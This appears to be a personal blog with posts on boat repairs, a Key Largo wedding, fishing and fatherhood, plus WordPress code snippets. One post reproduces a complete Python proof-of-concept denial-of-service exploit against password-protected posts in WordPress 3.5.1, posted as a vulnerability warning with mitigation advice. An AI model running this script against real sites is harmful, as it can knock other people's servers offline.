Snorkeling Grecian Rocks, 6/28/2013

The day before our wedding, we took some guests out to Grecian Rocks off Key Largo for a snorkeling adventure that they’ll never forget.

More Goodies For The Boat

I wanted to write an update to my last post about fixing up my boat.

I re-installed the starter, tightened up all the other small issues, and cranked the engine for about ten minutes. Nothing.

BUT … I think I flooded it … because the next day she fired up on the first try, nice and strong, just like she should!

Before it was running, I bought this tool to [attempt to] test the ignition system:

AutoCraft AC664 Ignition TesterTo be fair, the boat has a points ignition system which may somehow differ from other similar systems, but this thing DID NOT do the job. A spark is a spark, and nothing was happening with this tool installed as it should be. My guess? The shaft is pretty loose and difficult to adjust, and coated with some sort of anodized material. They should have made the shaft uncoated copper, aluminum, or nickel. NOT anodized steel.

I know the tool wasn’t working as it should, because the engine actually fired up while it was connected, but this thing still wasn’t sparkin’!

Yesterday, I decided I was sick of wrenching the batteries on and off every time I got on the boat. So, I ordered this:

SAMSUNGThis is a fantastic piece, which allows me to select a single battery, both batteries, or completely disconnect them. It’s rated for 230A continuous and 345A momentary, which should be ample (no pun intended). It also includes a field disconnect, so the switch can be moved with the engine running – which is a great feature. Installation was quick and easy.

So the boat starts, runs, shifts, and (hopefully) floats well. Time to go play! We’re leaving for the Keys tomorrow evening … Cheers!

Rebuilding the Boat, One Piece at a Time

With the birth of our baby boy, I haven’t had a whole lot of time to spend working on my favorite project, a 1989 Raven 2100cc cruiser. But next week, our wedding is coming up. We’ve rented a nice house in Key Largo for the wedding week which is on the water. My plan all along was to have our boat parked behind the house ready to go at a moment’s notice.

That means spending a bunch of time getting the boat ready to go. As I said, I haven’t had a chance to fuss with the boat in a few months, much less maintain or take it out for a spin. The poor thing needs some love…

Over the last month, I toured the hardware stores of Palm Beach county and rounded up the pieces needed to convert the trailer to a bunk-type trailer. I’ll wait until the boat is in the water to make this modification, though.

I'm not a huge fan of the rollers
I’m not a huge fan of the rollers. Just look what they’re doing to the bottom of the boat!

A bunch of time was also spent purchasing “manly” tools like a circular saw and angle grinder, and assembling new seat bases and an new engine cover. Next, I carpeted the pieces and got them re-installed in the boat. The old ones were pretty rotten!

New seat bases and engine cover
New seat bases and engine cover

I towed her home, hooked up the hose, and turned the key. -click- NOTHING. SMH. Check the battery. Not dead. NOT GOOD.

I pulled the cover off the engine.

Getting this beast ready for the summer
Getting this beast ready for the summer

After a close inspection of the electric system, I decided that everything was so corroded that there couldn’t be much current getting to the starter. I pull out the tools and go to work. The first stop was the starter wiring. I went to remove the big wires to the starter, and because it was rusted solid, I broke off part of the starter solenoid.

While removing power cables, I broke the terminal right off the solenoid
While removing power cables, I broke the terminal right off the solenoid

Nice. Removed the whole starter from the engine and took it upstairs. Bench tested the starter motor – works great even though about a half-gallon of water came streaming out when I inverted it. Removed the covers, cleaned the motor well, and reassembled. Working even better now! Next, I ordered a new solenoid from Amazon. Thanks to Tina’s wonderful Amazon Prime membership, it arrived the next day. After reassembly, we have this beautiful piece:

Brand new solenoid and reconditioned (internals) for the starter motor
Brand new solenoid and reconditioned (internals) for the starter motor

Okay, bench tested it once more, and it’s working exactly as it should. Cool beans! Maybe I should grab a can of Rustoleum to get it looking nice again? Nahh, too much effort and that probably won’t really help for long.

After I invest in a gallon of dielectric grease, I’ll re-install it, clean up the terminals on the trim system wiring, and start over! Only seven days to go before the wedding week begins, so I gotta have her running solid before then! Wish me luck!

UPDATE 6/19: Got the starter re-installed and she cranks right over. Now, to hook back up fuel and fire and see what happens! I feel confident that things are going to work just fine.

WordPress search__only_ Variables

Here’s another object-oriented mu-plugin that you can expand upon if needed. This adds the option to perform a search with “&search__only_titles” or “&search__only_content” in the url to search only titles or content of posts.

[code language=”php”]
<?php

class rdc_search_object {

function __construct() {
add_filter( ‘posts_search’, ‘filter__posts_search’ );
}

function filter__posts_search( $query ) {
$query_parts = explode( ‘ OR ‘, $query );

if ( isset( $_GET[‘search__only_titles’] ) )
return $query_parts[0] . ‘))’;

if ( isset( $_GET[‘search__only_content’] ) )
return ‘ AND ((‘ . $query_parts[1];

return $query;
}

}

$rdc_search_object = new rdc_search_object();

// omit[/code]

Go ahead and use this juicy tidbit and let me know in the comments what creative use you found for it.

Never-Ending Pagination in WordPress

Take your site’s slideshows to the next level with the following:

[code language=”php”]// Slightly different way of getting a previous post than get_adjacent_post(), this
// function will grab a post in a SINGLE specific category. We’ll go ahead and
// return it as a permalink since that’s ultimately what we want anyways.
function rdc_get_prev_url_in_category( $in_category ) {
global $post, $wpdb;

// Convert category to id if it’s a slug
if ( ! is_numeric( $in_category ) )
$in_category = get_category_by_slug( $in_category )->term_id;

// This query will grab the preceding post id in $in_category
$query = $wpdb->prepare( "
SELECT p.ID FROM $wpdb->posts AS p
INNER JOIN $wpdb->term_relationships AS tr ON p.ID = tr.object_id
INNER JOIN $wpdb->term_taxonomy tt ON tr.term_taxonomy_id = tt.term_taxonomy_id
AND tt.taxonomy = ‘category’
AND tt.term_id IN (%d)
WHERE p.ID < %d
AND p.post_type = ‘post’
AND p.post_status = ‘publish’
ORDER BY p.ID DESC LIMIT 1
", $in_category, $post->ID );

// Formulate cache key and see if it exists
$query_key = ‘rdc_previous_post_’ . md5( $query );
$result = wp_cache_get( $query_key );

// Cache key exists so lets use it
if ( false !== $result ) {
if ( $result )
$prev_post = get_post( $result );
return get_permalink( $prev_post->ID );
}

// Cache key didn’t exist, lets run a new query
$result = $wpdb->get_var( $query );

// Query failed for some reason, probably this is
// the first post in the category. Go home instead.
if ( null === $result )
return get_bloginfo( ‘home’ );

// Save query result for use later
wp_cache_set( $query_key, $result );

// Return the permalink of the resulting post id
if ( $result ) {
$prev_post = get_post( $result );
return get_permalink( $prev_post->ID );
}

// Something crazy happened to get here, but you
// never know …
return get_bloginfo( ‘home’ );
}[/code]

The next part actually filters the wp_link_pages arguments and decides where to put a next button where one didn’t previously exist. I also threw in an additional previous button, which uses some javascript to take the user back to the previous page. There’s probably some creative logic you can write to do it without javascript, but that’s probably unnecessary in today’s world.

[code language=”php”]function rdc_filter_wp_link_pages_args( $r ) {
global $page, $numpages;

// These links should match the design of your existing links
// and you should change 12345 to your slideshow category

// If last page of a slideshow, show a "next" button where there wouldn’t normally be one
if ( $r[‘next_or_number’] == ‘next’ &amp;&amp; $page == $numpages &amp;&amp; ” == $r[‘previouspagelink’] ) {
$repl_next_link = ‘<a href="’ . rdc_get_prev_url_in_category( 12345 ) . ‘">NEXT &amp;raquo;</a>’;
echo $r[‘before’] . $repl_next_link . $r[‘after’];
}

// If first page of a slideshow, showing "back" button where there wouldn’t normally be one
if ( $r[‘next_or_number’] == ‘next’ &amp;&amp; $page == 1 &amp;&amp; ” == $r[‘nextpagelink’] ) {
$repl_prev_link = ‘<a onclick="window.history.back();">&amp;laquo; PREVIOUS</a>’;
echo $r[‘before’] . $repl_prev_link . $r[‘after’];
}

return $r;
}
add_filter( ‘wp_link_pages_args’, ‘rdc_filter_wp_link_pages_args’ );[/code]

WordPress Password Post DoS Vulnerability

Hey guys, it’s a bad day when I get things like this in my inbox:

[python]# Proof of Concept
# WordPress 3.5.1
# Denial of Service
# Author: vnd at vndh.net
import httplib
import re

def get_cookie_hash(hostname, wplogin):
headers = {‘Content-type’: ‘application/x-www-form-urlencoded’}
handler = httplib.HTTPConnection(hostname)
handler.request(‘POST’, wplogin, ‘action=postpass&post_password=none’, headers=headers)
response = handler.getresponse()
set_cookie = response.getheader(‘set-cookie’)
if set_cookie is None: raise RuntimeError(‘cannot fetch set-cookie header’)

pattern = re.compile(‘wp-postpass_([0-9a-f]{32})’)
result = pattern.search(set_cookie)
if result is None: raise RuntimeError(‘cannot fetch cookie hash’)

return result.groups()[0]

def send_request(hostname, post, cookie_name):
headers = {‘Cookie’: ‘wp-postpass_%s=%%24P%%24Spaddding’ % cookie_name}
handler = httplib.HTTPConnection(hostname)
handler.request(‘GET’, post, ‘action=postpass&post_password=asdf’, headers=headers)

if __name__ == ‘__main__’:
hostname = ‘wordpress.remote’
wplogin = ‘/wp-login.php’
posturl = ‘/?p=4’ # link to password protected post
requests = 1000

cookie_hash = get_cookie_hash(hostname, wplogin)
print ‘[+] received cookie hash: %s’ % cookie_hash
for i in xrange(requests):
print ‘[+] sending request %d…’ % (i + 1)
send_request(hostname, posturl, cookie_hash)[/python]

It’s even worse when I run the code and the target server crashes and burns.

I wanted to make everyone else in the WordPress community aware that this threat is very real. I’ve tested it on 3.1, 3.5, and 3.6 – all very vulnerable – and I would guess that versions below 3 are also vulnerable. If you are using password protected posts, you’ll want to go reverse that setting on each post. This exploit, though targeted, will completely cripple your server if run against it.

The WP Core Team is working on a patch which will fix this – however, the solution that Krzysztof provided at https://vndh.net/note:wordpress-351-denial-service did not work for me, the vulnerability remained. My guess is Krzysztof had a more powerful server which was able to overcome the attack. In the case of most shared hosts and/or less-scaled servers, the fix will not help. Based on the nature of how the attack works, this jumps out at me as the reason.

SIDENOTE: This isn’t actually a vulnerability in WordPress, it’s in the phpass library that WordPress uses. I’m guessing there are other very vulnerable software packages out there.

Anyways, until 3.6 you might want to refrain from using any password protected posts. Good luck!

Plantation Boat Mart Owner’s Tournament

The Reef-Seeker CrewAll this parenting talk might lead you to believe that I’ve gone soft.

On the contrary friends, on the contrary.

Over the weekend, I wrestled with a tournament winning fish that happened to be on the end of my line. He pulled hard, wound up under the boat around one of the engines, and then back down on the ocean floor. I fought with the beast and freed the line from the engine and tried to get the fish into the boat. After a few minutes of battle there was a mighty tug from the opposing end and then the 50# line broke.. Rats.

Did I mention that I was doing all of that with my bare hands, because the line had been cut somewhere between the fish and the fishing pole? Did I also mention that the boat was pitching wildly in 600-feet of water 20-miles off Islamorada in the post-tropical-storm ocean?

Needless to say, I only landed one other fish, which broke the leader crimp at the boat. It was not a productive day for the Reef Seeker – we only managed to get a single under-sized fish on board. Back into the ocean for that one.

So back on shore at the weigh-in and awards ceremony, we found out that my fish would have easily won the big money prize in comparison to the average-sized winning Mahi. The same can be said of another fish that Roger hooked up with. A huge 180 from last year, now we’re able to find the fish but can’t seem to get them into the boat. This can only spell great things for next year … or maybe we’ll try again next week!

I have certainly not lost my adventurous spirit – in fact, I am excited to bring Rylan along on these adventures, but it’s probably too soon for that still.

Cheers!

Starting a Family is a Lot Like Work

Wow – welcome to being old and wrinkly, overweight, and sounding a lot like people from some previous generation. I just blinked my eyes and my squeaky-clean newborn is almost four months old. I can’t believe it. They really do grow up so fast. Multiply that by three and we have a one-year-old. Again by five and he’ll be heading off to kindergarten. I don’t even want to think about anything further than that.

Rich and RylanAnyways, I’m having a blast being a father. Rylan is robust enough now that I don’t feel like he’s going to break whenever I pick him up. And he’s a tough kid already. He’ll rival the best of them with his stunning good looks, strength, and that cranium. The kid is already attempting to have intelligent conversations and very clearly picks up on pretty high-level stuff. Nice… He’ll be outsmarting his parents in no time. I can’t wait.

Tina and RichSo we’re also in the home stretch of wedding planning. It seems like all the major stuff is organized, planned, and paid for. We’re on to all of the finest details now – which socks will match my outfit, which hairstyle looks right with Tina’s dress, what font to use on place-markers. You know, the types of things that don’t cost much but will make you absolutely daft during contemplation.

I’m more excited than I thought I would be though. Naturally, it is my wedding, and I’m marrying a woman that I love. But more than that, I’m marrying a woman that I like very much. So all modesty out the window and cheers to me. I can’t wait to see a few of you there, and share with you one of the most special nights of my life. And the parties. Oh, the parties. I can’t wait to see a few of you experience how we party in Key Largo. Plan to go home with a belly full of Mahi-mahi, and still swaying from a combination of island lager and time aboard various sea vessels. Don’t plan to go home un-entertained.